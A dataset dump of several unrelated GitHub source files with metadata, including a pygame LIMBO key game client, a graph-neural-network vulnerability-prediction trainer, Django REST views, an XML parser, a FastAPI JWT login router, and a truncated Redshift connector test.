seq_id string | text string | repo_name string | sub_path string | file_name string | file_ext string | file_size_in_byte int64 | program_lang string | lang string | doc_type string | stars int64 | dataset string | pt string | api list |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
75264403945 | import socket
import pygame
# noinspection PyUnresolvedReferences,PyProtectedMember
from pygame._sdl2 import Window
from typing import Any
from _thread import start_new_thread
import winsound
from time import sleep
from json import loads, dumps, load
from pymsgbox import alert
class LimboKeysClient:
def __init__(self):
self.id = -1 # 0-7 assigned by server, -1 if unknown
self.position = [0, -300]
self.id_surface = pygame.Surface((0, 0))
self.wants_to_quit = False
self.alive = True
self.highlight_amount: float = 0
self.clicked = False
self.clickable = False
self.success = False
start_new_thread(self.listening_thread, ())
def listening_thread(self):
try:
assigned_client_id = False
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect(("localhost", 6666))
s.sendall(dumps({"quit": False, "clicked": False}).encode('ascii'))
while True:
sleep(0.02)
msg: dict[str, Any] = loads(s.recv(1024).decode('ascii'))
self.id = msg["id"]
self.position = msg["position"]
self.alive = msg["alive"]
self.success = msg["success"]
self.clickable = msg["clickable"]
self.highlight_amount = min(1, max(self.highlight_amount + msg["highlight"] * 4 / FRAMERATE, 0))
if not assigned_client_id:
if self.id == 0:
pygame.mixer.music.load("LIMBO.mp3")
pygame.mixer.music.set_volume(0.3)
if music:
pygame.mixer.music.play()
pygame.mixer.music.set_pos(176)
self.id_surface = font.render(str(self.id), True, (0, 0, 0))
assigned_client_id = True
s.sendall(dumps({"quit": self.wants_to_quit, "clicked": self.clicked}).encode('ascii'))
except Exception as e:
print(e)
WIDTH, HEIGHT, FRAMERATE = 150, 150, 75
# configurables (do config.json)
borderless = False
transparent = False
music = True
sfx = True
# ==============================
try:
with open("config.json") as f:
data: dict[str, Any] = load(f)
borderless = data.get("borderless", False)
transparent = data.get("transparent", False)
music = data.get("music", True)
sfx = data.get("sfx", True)
except FileNotFoundError:
pass
pygame.init()
flags = 0
if borderless:
flags |= pygame.NOFRAME
screen = pygame.display.set_mode([WIDTH, HEIGHT], flags=flags)
clock = pygame.time.Clock()
font = pygame.font.SysFont("Arial", 20)
key = pygame.image.load("key.png").convert_alpha()
green_key = pygame.image.load("green-key.png").convert_alpha()
pygame.display.set_caption("LIMBO")
client = LimboKeysClient()
pgwindow = Window.from_display_module()
if transparent:
import win32api
import win32con
import win32gui
# Create layered window
hwnd = pygame.display.get_wm_info()["window"]
win32gui.SetWindowLong(hwnd, win32con.GWL_EXSTYLE,
win32gui.GetWindowLong(hwnd, win32con.GWL_EXSTYLE) | win32con.WS_EX_LAYERED)
# Set window transparency color
win32gui.SetLayeredWindowAttributes(hwnd, win32api.RGB(*(1, 1, 1)), 0, win32con.LWA_COLORKEY)
running = True
while running and client.alive:
for event in pygame.event.get():
if event.type == pygame.QUIT:
client.wants_to_quit = True
sleep(0.1)
running = False
if event.type == pygame.MOUSEBUTTONDOWN:
if event.button == 1:
if client.clickable:
client.clicked = True
screen.fill((1, 1, 1))
if client.highlight_amount != 0:
screen.blit(green_key, green_key.get_rect(center=(WIDTH / 2, HEIGHT / 2)))
key.set_alpha(255 - int(client.highlight_amount * 255))
screen.blit(key, key.get_rect(center=(WIDTH / 2, HEIGHT / 2)))
else:
screen.blit(key, key.get_rect(center=(WIDTH / 2, HEIGHT / 2)))
# screen.blit(client.id_surface, (10, 10))
pgwindow.position = [int(pos) for pos in client.position]
pygame.display.flip()
clock.tick(FRAMERATE)
if client.clicked:
if client.success:
alert("You win")
else:
if sfx:
start_new_thread(winsound.PlaySound, ("SystemExclamation", winsound.SND_ALIAS))
alert("Wrong guess")
pygame.quit()
| quasar098/limbos32 | main.py | main.py | py | 4,638 | python | en | code | 10 | github-code | 36 | [
{
"api_name": "pygame.Surface",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "_thread.start_new_thread",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "socket.socket",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "socket.AF_INET"... |
20006327119 | import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.nn.utils.rnn import pad_sequence
from torch.nn.utils.rnn import pack_padded_sequence
from torch.nn.utils.rnn import pad_packed_sequence
from gensim.models.word2vec import Word2Vec
import torch_geometric.nn as pyg_nn
import torch_geometric.utils as pyg_utils
import time
from datetime import datetime
import networkx as nx
# from torch_geometric.datasets import TUDataset
# from torch_geometric.datasets import Planetoid
from torch_geometric.data import DataLoader
from torch_geometric.data import Data
from torch_geometric.data import InMemoryDataset, Dataset, download_url
# import torch_geometric.transforms as T
from tensorboardX import SummaryWriter
# from sklearn.manifold import TSNE
import matplotlib.pyplot as plt
import pandas as pd
import os
import logging
from pathlib import Path
import json
import argparse
from sklearn.metrics import precision_score, recall_score, f1_score, accuracy_score, confusion_matrix
try:
import cPickle as pickle
except:
import pickle
from model import GNNStack, GNNStack2, GNNStack3
from data_loader import MyLargeDataset
# import nni
# from nni.utils import merge_parameter
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
logger = None
# setting device on GPU if available, else CPU
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
#Additional Info when using cuda
if device.type == 'cuda':
print('#', torch.cuda.get_device_name(0))
# print('# Memory Usage:')
# print('# Allocated:', round(torch.cuda.memory_allocated(0)/1024**3,1), 'GB')
# print('# Cached: ', round(torch.cuda.memory_reserved(0)/1024**3,1), 'GB')
def plot_dataset(dataset):
edges_raw = dataset.data.edge_index.numpy()
edges = [(x, y) for x, y in zip(edges_raw[0, :], edges_raw[1, :])]
labels = dataset.data.y.numpy()
G = nx.Graph()
G.add_nodes_from(list(range(np.max(edges_raw))))
G.add_edges_from(edges)
plt.subplot(111)
options = {
'node_size': 30,
'width': 0.2,
}
nx.draw(G, with_labels=False, node_color=labels.tolist(), cmap=plt.cm.tab10, font_weight='bold', **options)
plt.show()
def myprint(s, is_log=0):
print(s)
if is_log>0:
logger.info(s)
def test(loader, model, is_validation=False):
model.eval()
correct = 0
y_true = []
y_pred = []
for data in loader:
with torch.no_grad():
pred = model(data)
# pred = pred.argmax(dim=1)
label = data.y
_, pred = torch.max(pred.data, 1)
y_true.append(label.cpu())
y_pred.append(pred.cpu())
correct += pred.eq(label).sum().item()
total = len(loader.dataset)
# return correct / total
y_true = torch.cat(y_true)
y_pred = torch.cat(y_pred)
tn, fp, fn, tp = confusion_matrix(y_true, y_pred).ravel()
res = {
"accuracy": accuracy_score(y_true, y_pred),
"recall": recall_score(y_true, y_pred),
"f1": f1_score(y_true, y_pred),
"precision": precision_score(y_true, y_pred),
"tn": tn,
"fp": fp,
"fn": fn,
"tp": tp
}
# if res['f1'] < 0.01:
# logger.info("y_true: {}".format(y_true))
# logger.info("y_pred: {}".format(y_pred))
return res
def print_result(phase, score, epoch = -1):
if phase in ['train', 'vali']:
myprint("Epoch {}, {}:\tAcc\tR\tP\tF1\tTN\tFP\tFN\tTP".format(epoch, phase), 1)
myprint("Epoch {}, {}:\t{:.4f}\t{:.4f}\t{:.4f}\t{:.4f}\t{}\t{}\t{}\t{}".format(epoch, phase,
score['accuracy'], score['recall'], score['precision'], score['f1'],
score['tn'], score['fp'], score['fn'], score['tp']), 1)
else:
myprint("{}:\tAcc\tR\tP\tF1\tTN\tFP\tFN\tTP".format(phase), 1)
myprint("{}:\t{:.4f}\t{:.4f}\t{:.4f}\t{:.4f}\t{}\t{}\t{}\t{}".format(phase,
score['accuracy'], score['recall'], score['precision'], score['f1'],
score['tn'], score['fp'], score['fn'], score['tp']), 1)
def train(params, dataset, writer, plot=False, print_grad=False):
data_size = len(dataset)
print("data_size:", data_size)
logger.info("data_size: {}".format(data_size) )
loader = DataLoader(dataset[:int(data_size * 0.8)], batch_size=params['batch_size'], shuffle=True)
# loader = DataLoader(dataset[:800], batch_size=params['batch_size'], shuffle=True)
vali_loader = DataLoader(dataset[int(data_size * 0.8): int(data_size * 0.9)], batch_size=params['batch_size'], shuffle=True)
test_loader = DataLoader(dataset[int(data_size * 0.9):], batch_size=params['batch_size'], shuffle=True)
# build model
if params['model_type'] == 'GNNStack2':
logger.info("loading model: GNNStack2")
model = GNNStack2(params)
elif params['model_type'] == 'GNNStack3':
logger.info("loading model: GNNStack3")
model = GNNStack3(params)
else:
logger.info("loading model: GNNStack")
model = GNNStack(params)
# gpu_tracker = MemTracker() # define a GPU tracker
# gpu_tracker.track()
# print(model)
# exit()
model.to(device)
# gpu_tracker.track()
# print("len(model.convs):", len(model.convs))
opt = optim.Adam(model.parameters(), lr=params['learning_rate'], weight_decay=5e-4)
# opt = optim.SGD(model.parameters(), lr=LEARNING_RATE, momentum=0.9)
min_valid_loss = np.inf
best_f1_score = -1
best_model_path = ""
train_accuracies, vali_accuracies = list(), list()
# train
for epoch in range(params['epoch']):
logger.info("=== now epoch: %d" % epoch)
total_loss = 0
model.train()
for batch in loader:
# print(batch.train_mask, '----')
opt.zero_grad() # 清空梯度
pred = model(batch)
# pred = pred.argmax(dim=1, keepdim=True)
# logger.info("pred: {}".format(pred))
label = batch.y.to(device)
# print("pred.shape : ",pred.shape)
# print("label.shape: ",label.shape)
loss = model.loss(pred, label)
# gpu_tracker.track()
loss.backward() # 反向计算梯度,累加到之前梯度上
opt.step() # 更新参数
total_loss += loss.item() * batch.num_graphs
# gpu_tracker.track()
# delete caches
del pred, loss
# torch.cuda.empty_cache()
# gpu_tracker.track()
total_loss /= len(loader.dataset)
writer.add_scalar("loss", total_loss, epoch)
# validate
train_score = test(loader, model)
vali_score = test(vali_loader, model)
train_accuracies.append(train_score['accuracy'])
vali_accuracies.append(vali_score['accuracy'])
if print_grad:
for i, para in enumerate(model.parameters()):
print(f'{i + 1}th parameter tensor:', para.shape)
print(para)
print("grad:")
print(para.grad)
logger.info("Epoch: {}, loss: {:.6f}".format(epoch, total_loss))
if total_loss < min_valid_loss:
# Saving State Dict
# torch.save(model.state_dict(), MODEL_SAVE_PATH + "/gcn_model_epoch%d.pth" % epoch)
# best_model_path = MODEL_SAVE_PATH + "/gcn_model_epoch%d.pth" % epoch
print("Training Loss Decreased: {:.6f} --> {:.6f}.".format(min_valid_loss, total_loss))
logger.info("Training Loss Decreased: {:.6f} --> {:.6f}.".format(min_valid_loss, total_loss))
min_valid_loss = total_loss
if vali_score['f1'] > best_f1_score:
# Saving State Dict
torch.save(model.state_dict(), params['model_save_path'] + "/gcn_model_epoch%d.pth" % epoch)
best_model_path = params['model_save_path'] + "/gcn_model_epoch%d.pth" % epoch
print("New best F1: {:.4f} --> {:.4f}. Saved model: {}".format(best_f1_score, vali_score['f1'], best_model_path))
logger.info("New best F1: {:.4f} --> {:.4f}. Saved model: {}".format(best_f1_score, vali_score['f1'], best_model_path))
best_f1_score = vali_score['f1']
print_result("train", train_score, epoch)
print_result("vali", vali_score, epoch)
# exit()
# report intermediate result
# nni.report_intermediate_result(vali_score['accuracy'])
# logger.info("w_pdt: {}, w_ref: {}, w_def: {}, w_lp: {}, w_ns: {}".format(model.w_pdt, model.w_ref, model.w_def, model.w_lp, model.w_ns))
writer.add_scalar("test_accuracy", vali_score['accuracy'], epoch)
# report final result
# nni.report_final_result(vali_score['accuracy'])
# Load
# model = Net()
if os.path.exists(best_model_path):
myprint("loading the best model: %s" % best_model_path, 1)
model.load_state_dict(torch.load(best_model_path))
test_score = test(test_loader, model)
print_result("test", test_score)
if plot:
plt.plot(train_accuracies, label="Train accuracy")
plt.plot(vali_accuracies, label="Validation accuracy")
plt.xlabel("# Epoch")
plt.ylabel("Accuracy")
plt.legend(loc='upper right')
# plt.show()
plt.savefig(params['model_save_path'] + "/gcn_model_accuracy.pdf")
return model
def find_edges(func_key, relations_call, relations_callby, deleted, lv=0, call_type="all", nodes=[], edge_index=[], edge_weight=[]):
if lv == 0:
nodes = [func_key]
func_index = nodes.index(func_key)
if (lv < 2 and lv > -2) and func_key in relations_call.keys() and call_type in ['all', 'call']:
weight = {}
for sub_func in relations_call[func_key]:
if sub_func in deleted:
continue
if not sub_func in weight.keys():
weight[sub_func] = 1
else:
if weight[sub_func] < 1.5:
weight[sub_func] += 0.1
for sub_func in weight.keys():
if sub_func not in nodes:
nodes.append(sub_func)
sub_func_index = nodes.index(sub_func)
edge_index.append( [func_index, sub_func_index] )
edge_weight.append(weight[sub_func])
nodes, edge_index, edge_weight = find_edges( sub_func, relations_call, relations_callby, deleted, lv+1, "call", nodes, edge_index, edge_weight)
if (lv < 2 and lv > -2) and func_key in relations_callby.keys() and call_type in ['all', 'callby']:
weight = {}
for sub_func in relations_callby[func_key]:
if sub_func in deleted:
continue
if not sub_func in weight.keys():
weight[sub_func] = 1
else:
if weight[sub_func] < 1.5:
weight[sub_func] += 0.1
for sub_func in weight.keys():
if sub_func not in nodes:
nodes.append(sub_func)
sub_func_index = nodes.index(sub_func)
edge_index.append( [func_index, sub_func_index] )
edge_weight.append(weight[sub_func])
nodes, edge_index, edge_weight = find_edges( sub_func, relations_call, relations_callby, deleted, lv-1, "callby", nodes, edge_index, edge_weight)
return nodes, edge_index, edge_weight
def read_relation_file(relation_file, deleted):
res = {}
# read relations
relations_call = {}
relations_callby = {}
json_str = ""
if not os.path.exists(relation_file):
return res
with open(relation_file) as f:
json_str = f.read().strip()
if json_str == "":
return []
obj = json.loads(json_str)
lv0_functions = []
for k, arr in obj.items():
for v in arr:
if v['type'] == 'call':
if k in deleted or v['value'] in deleted:
continue
if k in relations_call.keys():
relations_call[k].append(v['value'])
else:
relations_call[k] = [v['value']]
elif v['type'] == 'callby':
if k in deleted or v['value'] in deleted:
continue
if k in relations_callby.keys():
relations_callby[k].append(v['value'])
else:
relations_callby[k] = [v['value']]
elif v['type'] == 'define':
if v['value'] not in lv0_functions and v['value'] not in deleted:
lv0_functions.append(v['value'])
print("len(lv0_functions):", len(lv0_functions))
for func in lv0_functions:
nodes = []
edge_index = []
edge_weight = []
nodes, edge_index, edge_weight = find_edges(func, relations_call, relations_callby, deleted, 0, "all", [], [], [])
res[func] = {
"nodes": nodes,
"edge_index": edge_index,
"edge_weight": edge_weight
}
return res
def read_jh_relation_file(entities_file, relation_file, deleted):
res = {}
# read relations
relations_call = {}
relations_callby = {}
json_str = ""
if not os.path.exists(relation_file):
return res
lv0_functions = []
with open(entities_file) as f:
for line in f.readlines():
l = line.strip()
if l=="":
continue
obj = json.loads(l)
if obj['level'] == 0 and obj['vul'] == 1:
lv0_functions.append(obj['func_key'])
with open(relation_file) as f:
for line in f.readlines():
l = line.strip()
if l == "":
continue
obj = json.loads(l)
for k, arr in obj.items():
for v in arr:
if v['type'] == 'call':
if k in relations_call.keys():
relations_call[k].append(v['value'])
else:
relations_call[k] = [v['value']]
elif v['type'] == 'callby':
if k in relations_callby.keys():
relations_callby[k].append(v['value'])
else:
relations_callby[k] = [v['value']]
print("len(lv0_functions):", len(lv0_functions))
logger.info("len(lv0_functions): {}".format(len(lv0_functions)))
for func in lv0_functions:
nodes = []
edge_index = []
edge_weight = []
nodes, edge_index, edge_weight = find_edges(func, relations_call, relations_callby, deleted, 0, "all", [], [], [])
res[func] = {
"nodes": nodes,
"edge_index": edge_index,
"edge_weight": edge_weight
}
return res
def get_params():
# args
parser = argparse.ArgumentParser(description='Test for argparse')
parser.add_argument('--tasks_file', help='tasks_file', type=str, default='/data/function2vec3/tasks.json')
parser.add_argument('--functions_path', help='functions_path', type=str,
default=BASE_DIR + "/data/function2vec3/functions_jy")
parser.add_argument('--embedding_path', help='embedding_path', type=str, default='/data/function2vec4')
parser.add_argument('--model_save_path', help='model_save_path', type=str, default='/data/automl_models')
parser.add_argument('--best_model_path', help='best_model_path', type=str, default="")
parser.add_argument('--model_type', help='model_type', type=str, default="GNNStack")
parser.add_argument('--input_dim', help='input_dim', type=int, default=128)
parser.add_argument('--output_dim', help='output_dim', type=int, default=2)
parser.add_argument('--hidden_dim', help='hidden_dim', type=int, default=64)
parser.add_argument('--batch_size', help='hidden_dim', type=int, default=16)
parser.add_argument('--learning_rate', help='learning_rate', type=float, default=0.001)
parser.add_argument('--epoch', help='epoch', type=int, default=100)
parser.add_argument('--lp_path_num', help='lp_path_num', type=int, default=20)
parser.add_argument('--lp_length', help='lp_length', type=int, default=60)
parser.add_argument('--lp_dim', help='lp_dim', type=int, default=128)
parser.add_argument('--lp_w2v_path', help='lp_w2v_path', type=str,
default=BASE_DIR + "/data/function2vec2/models/w2v_lp_combine.bin")
parser.add_argument('--ns_length', help='ns_length', type=int, default=2000)
parser.add_argument('--ns_dim', help='ns_dim', type=int, default=128)
parser.add_argument('--ns_w2v_path', help='ns_w2v_path', type=str,
default=BASE_DIR + "/data/function2vec2/models/w2v_ns.bin")
parser.add_argument('--log_msg', help='log_msg', type=str, default="Soft weights + CE-loss")
args, _ = parser.parse_known_args()
# print(args)
return args
if __name__ == '__main__':
try:
params = get_params()
# get parameters form tuner
# tuner_params = nni.get_next_parameter()
# logger.debug(tuner_params)
#params = vars(merge_parameter(params, tuner_params))
params = vars(params)
# logger.info("params: {}".format(params))
# train
# /xye_data_nobackup/wenbo/dlvp/data/function2vec4/automl_dataset_1v1/
# log file
now_time = time.strftime("%Y-%m-%d_%H-%M", time.localtime())
log_file = "{}/../logs/{}_{}.log".format(BASE_DIR, now_time, params['model_type'])
logging.basicConfig(level=logging.INFO,
format='%(asctime)s %(levelname)s %(filename)s line: %(lineno)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S',
filename=log_file)
logger = logging.getLogger(__name__)
# Device
print('# Using device:', device)
logger.info("=== using device: %s" % str(device))
dataset_savepath = params['embedding_path'] + "/automl_dataset_1v1"
Path(dataset_savepath).mkdir(parents=True, exist_ok=True)
Path(params['model_save_path']).mkdir(parents=True, exist_ok=True)
dataset = MyLargeDataset(dataset_savepath, params)
logger.info("=== Train ===")
writer = SummaryWriter("./log/" + datetime.now().strftime("%Y%m%d-%H%M%S"))
model = train(params, dataset, writer, plot=False, print_grad=False)
except Exception as exception:
logger.exception(exception)
raise
logger.info("training GCN done.") | Woffee/dlvp | automl/main.py | main.py | py | 18,654 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.dirname",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 52,
"usage_type": "attribute"
},
{
"api_name": "os.path.abspath",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "torch.device",
"line... |
19593309895 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('carga', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='carga',
name='id_carga',
field=models.CharField(max_length=6),
),
]
| wellicfaria/cargobr | carga/migrations/0002_auto_20150922_1258.py | 0002_auto_20150922_1258.py | py | 389 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.db.migrations.Migration",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "django.db.migrations",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "django.db.migrations.AlterField",
"line_number": 14,
"usage_type": "call"
},
{... |
30395658662 | from rest_framework import status
from rest_framework.decorators import api_view
from rest_framework.response import Response
from django.http import HttpResponse
from rest_framework.generics import ListAPIView
from django.db.models import Q
from posts.models import Post, PostCategory, PostOwner
from memberships.models import Plan, Member
from posts.api.serializers import PostApi, PostCategoryApi, PostOwnerApi
from rest_framework import filters
from django_filters.rest_framework import DjangoFilterBackend
@api_view(['GET',])
def api_posts_view(request):
try:
post = Post.objects.all().exclude(post_status = 0)#filter(post_status = 1)
except Post.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
if request.method == 'GET':
serializer = PostApi(post, many=True)
return Response(serializer.data, status=status.HTTP_200_OK)
@api_view(['GET',])
def api_post_paid_view(request, uid):
try:
member = Member.objects.filter(Q(member_uid = uid) and Q(member_status = 1)).order_by('member_since').first() #rendezve a legutolsó előfizetés szerint
is_member = Member.objects.filter(member_uid = uid).last()
#ha member akkor lekérem azt, hogy aktiv e
if is_member and is_member.member_status == 1:
print('Ő member és aktív is')
#ha aktív akkor lekérem a hozzá tartozó cikkeket, ha nem akkor ingynees tartalmat jeleniti meg neki
member_plan = is_member.member_plan.plan_slug #aktuális tagság
print(member_plan)
posts = Post.objects.filter(Q(post_plan__plan_slug = member_plan) or Q(post_plan__plan_slug = 'free')).distinct() #ide majd egy exlude draft maitt
print(posts)
else:
print('Nem member vagy nem aktiv')
posts = Post.objects.filter(post_plan__plan_slug = 'free')
print('Ingyenes psoztok:',posts)
except Member.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
if request.method == 'GET':
serializer = PostApi(posts, many=True)
return Response(serializer.data, status=status.HTTP_200_OK)
class BookmarkList(ListAPIView):
serializer_class = PostApi
def get_queryset(self):
# Get URL parameter as a string, if exists
ids = self.request.query_params.get('ids', None)
# Get snippets for ids if they exist
if ids is not None:
# Convert parameter string to list of integers
ids = [ int(x) for x in ids.split(',') ]
# Get objects for all parameter ids
queryset = Post.objects.filter(id__in=ids).exclude(post_status = 0)
else:
# Else no parameters, return all objects
queryset = Post.objects.all()
return queryset
@api_view(['GET',])
def api_post_details_view(request, pk):
try:
post = Post.objects.get(pk=pk)
except Post.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
if request.method == 'GET':
serializer = PostApi(post)
return Response(serializer.data, status=status.HTTP_200_OK)
@api_view(['GET',])
def api_post_by_category_view(request, pk):
try:
post_by_category = Post.objects.filter(post_category = pk).exclude(post_status = 0)
except Post.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
if request.method == 'GET':
serializer = PostApi(post_by_category, many=True)
return Response(serializer.data, status=status.HTTP_200_OK)
@api_view(['GET',])
def api_post_by_owner_view(request, pk):
try:
post_by_owner = Post.objects.filter(post_owner = pk)
except Post.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
if request.method == 'GET':
serializer = PostApi(post_by_owner, many=True)
return Response(serializer.data, status=status.HTTP_200_OK)
@api_view(['GET',])
def api_post_categories_view(request):
try:
categories = PostCategory.objects.all()
except PostCategory.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
if request.method == 'GET':
serializer = PostCategoryApi(categories, many=True)
return Response(serializer.data, status=status.HTTP_200_OK)
@api_view(['GET',])
def api_post_owners_view(request):
try:
owners = PostOwner.objects.all()#filter(post_status = 1)
except Post.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
if request.method == 'GET':
serializer = PostOwnerApi(owners, many=True)
return Response(serializer.data, status=status.HTTP_200_OK)
#ezt majd törölni
@api_view(['POST',])
def api_post_create_view(request):
if request.method == 'POST':
serializer = PostApi(data=request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data, status=status.HTTP_201_CREATED)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
| siklerdaniiii/astral | posts/api/views.py | views.py | py | 5,074 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "posts.models.Post.objects.all",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "posts.models.Post.objects",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "posts.models.Post",
"line_number": 19,
"usage_type": "name"
},
{
"ap... |
37747156972 | from lxml import etree
import numpy as np
import re
class BhpDocumentParser:
isCPTRegistrationRequest = False
nsMap = {}
metadata = {}
cptMatrix = None
dissipationMatrices = None
def __init__(self, xmlTree):
self.xmlTree = xmlTree
self.generateNsMap()
self.generateMatrix()
self.metadata = BhpDocumentParser.lxml_to_dict(self.getRoot())
self.determineIsCPT()
def getRoot(self):
if (hasattr(self.xmlTree, 'getroot')):
return self.xmlTree.getroot()
return self.xmlTree
def determineIsCPT(self):
if ('registrationRequest' in self.metadata):
if ('sourceDocument' in self.metadata['registrationRequest']):
if ('CPT' in self.metadata['registrationRequest']['sourceDocument']):
self.isCPTRegistrationRequest = True
def generateMatrix(self):
conePenetrationTest = self.getElementByTagName('conePenetrationTest')
dissipationTests = self.getListOfElementsByTagName('dissipationTest')
if(conePenetrationTest is not None):
values = self.getChildElementByTagName(conePenetrationTest, 'values')
self.cptMatrix = BhpDocumentParser.convertDataToMatrix(values.text, 25)
if(dissipationTests is not None):
dissMatrixList = list()
for dissipationTest in dissipationTests:
values = self.getChildElementByTagName(dissipationTest, 'values')
matrix = BhpDocumentParser.convertDataToMatrix(values.text, 5)
dissMatrixList.append(matrix)
self.dissipationMatrices = dissMatrixList
return None
@staticmethod
def convertDataToMatrix(data, rows):
lines = data.split(';')
lines = [line.split(',') for line in lines]
lines = [line for line in lines if len(line)==rows]
return np.matrix(lines, dtype=np.float)
def getCptMatrix(self):
return self.cptMatrix
# list of matrices
def getDissipation(self):
return self.dissipationMatrices
# from lxml_to_dict, slightly adjusted the implementation to remove some tags
@staticmethod
def lxml_to_dict(element):
ret = {}
if element.getchildren() == []:
tag = BhpDocumentParser.stripNSFromTagName(element.tag)
if (tag != 'values'):
ret[tag] = element.text
else:
count = {}
for elem in element.getchildren():
subdict = BhpDocumentParser.lxml_to_dict(elem)
tag = BhpDocumentParser.stripNSFromTagName(element.tag)
subtag = BhpDocumentParser.stripNSFromTagName(elem.tag)
# subtag can only be None if the element tag is not a String (could be a comment), in which case we don't add it to the dict
if(subtag is None):
continue
if ret.get(tag, False) and subtag in ret[tag].keys():
count[subtag] = count[subtag]+1 if count.get(subtag, False) else 1
elemtag = subtag+str(count[subtag])
subdict = {elemtag: subdict[subtag]}
if ret.get(tag, False):
ret[tag].update(subdict)
else:
ret[tag] = subdict
return ret
@classmethod
def fromString(cls, xmlString):
return cls(etree.fromstring(xmlString))
@classmethod
def fromFile(cls, xmlFile):
return cls(etree.parse(xmlFile))
def generateNsMap(self):
for _, elem in etree.iterwalk(self.xmlTree, events = ('start-ns',)):
ns, url = elem
self.nsMap[ns] = '{' + url + '}'
def getCptParametersMap(self):
registrationRequest = self.metadata['registrationRequest']
if (registrationRequest is not None):
sourceDocument = registrationRequest['sourceDocument']
if (sourceDocument is not None):
cpt = sourceDocument['CPT']
if (cpt is not None):
conePenetrometerSurvey = cpt['conePenetrometerSurvey']
if (conePenetrometerSurvey is not None):
parameters = conePenetrometerSurvey['parameters']
if (parameters is not None):
return parameters
return None
def getElementByTag(self, tag):
for _, elem in etree.iterwalk(self.xmlTree, events = ('end',), tag = self.getTag(tag)):
return elem
return None
def isCPT(self):
return self.isCPTRegistrationRequest
def getChildElementByTagName(self, elem, name):
for _, elem in etree.iterwalk(elem, events = ('end',)):
if (name == BhpDocumentParser.stripNSFromTagName(elem.tag)):
return elem
return None
# returns first element without ns matching the name param
def getElementByTagName(self, name):
for _, elem in etree.iterwalk(self.xmlTree, events = ('end',)):
if (name == BhpDocumentParser.stripNSFromTagName(elem.tag)):
return elem
return None
@staticmethod
def stripNSFromTagName(name):
if (isinstance(name, str)):
return re.sub('{.*}', '', name)
return None
# returns list of elements without ns matching the name param
def getListOfElementsByTagName(self, name):
listOfElements = list()
for _, elem in etree.iterwalk(self.xmlTree, events = ('end',)):
if (name == BhpDocumentParser.stripNSFromTagName(elem.tag)):
listOfElements.append(elem)
if (len(listOfElements) != 0):
return listOfElements
return None
def getTag(self, fullTag):
(ns, tag) = fullTag.strip().split(":")
if (ns in self.nsMap):
return self.nsMap[ns] + tag
return None
def toString(self):
return etree.tostring(self.xmlTree, pretty_print = True).decode("utf-8")
def stackedPrintOfStructure(self):
stack = list()
for event, elem in etree.iterwalk(self.getRoot(), events=('start', 'end')):
if (not isinstance(elem.tag, str)):
continue
if (event == 'start'):
stack.append(elem.tag.split('}', 1)[1])
mapIndex = ""
# Print this in a way that it's easy to copy paste to get the proper metadata from the dictionary
for item in stack:
mapIndex += "['%s']" % item
print(mapIndex)
else:
stack.pop()
return stack
| ZBoukich/brofiles | scripts/bhpdocumentparser.py | bhpdocumentparser.py | py | 6,683 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.matrix",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "numpy.float",
"line_number": 52,
"usage_type": "attribute"
},
{
"api_name": "lxml.etree.fromstring",
"line_number": 90,
"usage_type": "call"
},
{
"api_name": "lxml.etree",
... |
27068411013 | from fastapi import APIRouter, Body
from models.model import User, UserLogin
from auth.jwt_handler import signJWT
router = APIRouter(
tags = ["User Routes"]
)
users = []
@router.get("/")
def get():
return {"Hello": "Wob"}
@router.post("/user/signup")
def user_signup(user: User = Body(default=None)):
users.append(user)
return signJWT(user.email)
def check_user(data: UserLogin):
for user in users:
if user.email == data.email and user.password == data.password:
return True
return False
@router.post("/user/login")
def user_login(user: UserLogin = Body(default=None)):
if check_user(user):
return signJWT(user.email)
else:
return{
"error": "Invalid login details"
}
| Namikaze007/TodoFastapi | routes/users.py | users.py | py | 802 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "fastapi.APIRouter",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "models.model.User",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "fastapi.Body",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "auth.jwt_handler.sign... |
42778530183 | from unittest.mock import Mock, patch
import pytest
from redshift_connector.error import InterfaceError, OperationalError, ProgrammingError
from toucan_connectors.pagination import (
KnownSizeDatasetPaginationInfo,
OffsetLimitInfo,
PaginationInfo,
)
from toucan_connectors.redshift.redshift_database_connector import (
ORDERED_KEYS,
AuthenticationMethod,
AuthenticationMethodError,
RedshiftConnector,
RedshiftDataSource,
)
from toucan_connectors.toucan_connector import DataSlice
CLUSTER_IDENTIFIER: str = 'toucan_test'
DATABASE_NAME: str = 'toucan'
@pytest.fixture
def redshift_connector():
return RedshiftConnector(
authentication_method=AuthenticationMethod.DB_CREDENTIALS.value,
name='test',
host='http://localhost',
port=0,
